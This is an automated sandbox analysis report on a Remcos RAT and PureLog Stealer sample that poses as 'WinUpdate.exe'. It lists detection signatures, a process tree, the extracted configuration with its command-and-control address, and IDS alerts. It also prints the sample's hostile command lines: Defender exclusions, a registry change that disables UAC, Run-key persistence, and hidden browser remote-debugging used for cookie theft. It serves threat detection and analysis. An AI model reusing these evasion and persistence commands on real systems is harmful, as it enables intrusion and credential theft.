Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
remi.exe

Overview

General Information

Sample name:remi.exe
Analysis ID:1564312
MD5:b074e2458b987efec69536a58316d5a6
SHA1:ffebefa18462d47fc8b82abc9069c9fdd6079da9
SHA256:e744e0aa890a2d9b5e6eed8403cb16f6098baee4a0529b1fabc0644ee4ba6b32
Tags:exeuser-lontze7
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • remi.exe (PID: 4372 cmdline: "C:\Users\user\Desktop\remi.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • powershell.exe (PID: 3472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remi.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\remi.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • remi.exe (PID: 4152 cmdline: "C:\Users\user\Desktop\remi.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
      • WinUpdate.exe (PID: 4836 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
        • powershell.exe (PID: 4832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 7188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • WinUpdate.exe (PID: 4876 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
        • WinUpdate.exe (PID: 672 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
          • chrome.exe (PID: 7292 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
            • chrome.exe (PID: 7628 cmdline: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1972,i,12355548801112023656,6493178295875206895,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • WinUpdate.exe (PID: 7356 cmdline: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\zkuwzgocnnacbxcaejqamgtb" MD5: B074E2458B987EFEC69536A58316D5A6)
          • WinUpdate.exe (PID: 7368 cmdline: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\beapzzzejvshdeqenuduxtnkcfqj" MD5: B074E2458B987EFEC69536A58316D5A6)
          • WinUpdate.exe (PID: 7388 cmdline: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe /stext "C:\Users\user\AppData\Local\Temp\mgfharkyxdkunkmiffxvayibdtasarj" MD5: B074E2458B987EFEC69536A58316D5A6)
          • msedge.exe (PID: 1128 cmdline: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default" MD5: BF154738460E4AB1D388970E1AB13FAB)
            • msedge.exe (PID: 7884 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1976,i,6555542127114482677,3967349702858175070,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
  • WinUpdate.exe (PID: 7680 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • WinUpdate.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • WinUpdate.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
  • WinUpdate.exe (PID: 2744 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • WinUpdate.exe (PID: 3768 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
    • WinUpdate.exe (PID: 3180 cmdline: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" MD5: B074E2458B987EFEC69536A58316D5A6)
  • msedge.exe (PID: 6952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8000 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2984 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8512 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5380 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • msedge.exe (PID: 8528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6664 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8 MD5: BF154738460E4AB1D388970E1AB13FAB)
    • identity_helper.exe (PID: 8700 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
    • identity_helper.exe (PID: 8752 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2680,i,13951100852068889132,5640976159608311399,262144 /prefetch:8 MD5: F8CEC3E43A6305AC9BA3700131594306)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["45.138.48.25:3333:0"], "Assigned name": "Document", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Temp", "Copy file": "WinUpdate.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E10MWO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "WinUpdat.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "WinUpdate", "Keylog folder": "WinUpdat", "Keylog file max size": ""}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\WinUpdat\WinUpdat.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 22 entries
          SourceRuleDescriptionAuthorStrings
          0.2.remi.exe.7e60000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.remi.exe.427e790.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.remi.exe.7e60000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.remi.exe.4d9f320.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  0.2.remi.exe.4d9f320.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    Click to see the 38 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\remi.exe, ProcessId: 4152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-E10MWO
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\remi.exe", ParentImage: C:\Users\user\Desktop\remi.exe, ParentProcessId: 4372, ParentProcessName: remi.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", ProcessId: 3472, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe, ParentProcessId: 4836, ParentProcessName: WinUpdate.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", ProcessId: 4832, ProcessName: powershell.exe
                    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", ParentImage: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe, ParentProcessId: 672, ParentProcessName: WinUpdate.exe, ProcessCommandLine: --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 7292, ProcessName: chrome.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\remi.exe, ProcessId: 4152, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-E10MWO
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\remi.exe", ParentImage: C:\Users\user\Desktop\remi.exe, ParentProcessId: 4372, ParentProcessName: remi.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", ProcessId: 3472, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\remi.exe", ParentImage: C:\Users\user\Desktop\remi.exe, ParentProcessId: 4372, ParentProcessName: remi.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\remi.exe", ProcessId: 3472, ProcessName: powershell.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 20 DE F9 EB A6 CC A7 80 BB 23 61 78 34 47 22 93 D3 40 E7 33 A4 97 16 CC 0A E4 B7 1E 81 A1 BF 02 A6 FF 46 08 B2 AE 15 67 7F 2A 7E A0 D4 A1 6C DE E8 E0 9D B9 79 6F AD AC 8F B4 06 4F 89 F1 B0 5E F1 2D 57 1C 46 58 EA 9B 33 8A 76 F4 B2 E2 69 99 8D 2F F6 14 AC 9D 13 6D 72 DC C7 7E BD 2D 24 30 22 7B 7A 02 64 D4 89 DC 81 05 02 20 31 3C DE 0D 02 04 53 52 2A D9 FB 80 13 6F , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe, ProcessId: 672, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-E10MWO\exepath
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-28T07:22:05.393388+010020327761Malware Command and Control Activity Detected192.168.2.64971245.138.48.253333TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-28T07:22:06.727100+010020327771Malware Command and Control Activity Detected45.138.48.253333192.168.2.649712TCP
                    2024-11-28T07:24:34.732394+010020327771Malware Command and Control Activity Detected45.138.48.253333192.168.2.649712TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-28T07:22:09.868682+010028033043Unknown Traffic192.168.2.649718178.237.33.5080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["45.138.48.25:3333:0"], "Assigned name": "Document", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "Temp", "Copy file": "WinUpdate.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E10MWO", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "WinUpdat.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "WinUpdate", "Keylog folder": "WinUpdat", "Keylog file max size": ""}
                    Source: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exeReversingLabs: Detection: 63%
                    Source: remi.exeVirustotal: Detection: 57%Perma Link
                    Source: remi.exeReversingLabs: Detection: 63%
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\WinUpdat\WinUpdat.dat, type: DROPPED
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: remi.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_2_0043293A
                    Source: remi.exe, 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f61a8aed-4

                    Exploits

                    barindex
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.remi.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.4d9f320.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.435c6b8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.remi.exe.427e790.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2140941294.0000000004261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4372, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: remi.exe PID: 4152, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_00406764 _wcslen,CoGetObject,6_2_00406764
                    Source: remi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49747 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49721 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49775 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49825 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49824 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49829 version: TLS 1.2
                    Source: remi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: aYVs.pdbSHA256 source: remi.exe
                    Source: Binary string: aYVs.pdb source: remi.exe
                    Source: C:\Users\user\Desktop\remi.exeCode function: 6_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_2_0040B335
